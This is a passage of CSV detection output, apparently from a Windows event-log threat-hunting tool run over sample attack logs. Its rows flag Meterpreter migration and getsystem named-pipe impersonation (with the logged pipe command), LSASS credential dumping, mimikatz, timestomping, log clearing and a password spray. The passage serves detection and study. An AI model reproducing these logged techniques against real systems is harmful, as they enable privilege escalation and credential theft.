07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3028 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-001048C10600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3044 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-001017C50600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\SearchIndexer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3264 | Tgt PGUID: 365ABB72-F6CF-5CC7-0000-00100C870700,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2500 | Tgt PGUID: 365ABB72-F787-5CC7-0000-001068B30A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2024 | Tgt PGUID: 365ABB72-F787-5CC7-0000-0010FBB30A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\mmc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2352 | Tgt PGUID: 365ABB72-F797-5CC7-0000-00105AF70A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1236 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010B31E0E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3712 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2144 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010CE400E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1344 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-001058500E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:26:34.133 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: \\vboxsrv\HTools\m.exe | Tgt Process: C:\Windows\explorer.exe | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/meterpreter_migrate_to_explorer_sysmon_8.evtx +2019-04-30 07:46:15.215 +00:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /c echo msdhch > \\.\pipe\msdhch | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4088 | PGUID: 365ABB72-FD47-5CC7-0000-00106AF61D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 07:46:15.215 +00:00,IEWIN7,1,high,PrivEsc,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation_sysmon/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 07:46:15.215 +00:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 07:46:15.215 +00:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 10:12:45.583 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\system32\cmd.exe | PID: 3292 | PGUID: 365ABB72-1EFA-5CC8-0000-0010D3DE1C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx +2019-04-30 10:13:42.052 +00:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\Explorer.EXE | CreationUtcTime: 2016-02-02 15:30:02.000 | PreviousCreationUtcTime: 2019-04-30 10:12:45.583 | PID: %PID% | PGUID: 365ABB72-16CD-5CC8-0000-0010483A0600,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-3FDE-5CC8-0000-0010142B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-3FDF-5CC8-0000-00103C480000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-0010014C0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00101E4C0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00104D520000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00100D550000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/proc_access_win_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 18:08:22.618 +00:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-04-30 18:08:29.138 +00:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-04-30 18:08:29.138 +00:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-04-30 18:08:29.138 +00:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-04-30 18:08:29.138 +00:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-04-30 19:27:00.297 +00:00,DESKTOP-JR78RLP,1102,high,Evas,Security Log Cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:02.847 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:02.847 +00:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:zmathis/jlake/melliott/jkulikowski/lschifano/kperryman/tbennett/cdavis/psmith/dpendolino/bking/eskoudis/celgee/cspizor/rbowes/cragoso/dmashburn/bgalbraith/cmoody/smisenar/wstrzelec/ebooth/jwright/lpesce/bhostetler/jorchilles/mtoussain/econrad/sanson/mdouglas/bgreenwood/jleytevidal/sarmstrong/baker/ssims/thessman/drook/cfleener/Administrator/edygert/gsalinas IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_PW-Spray_Count.yml,- +2019-04-30 19:27:03.925 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:05.020 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: 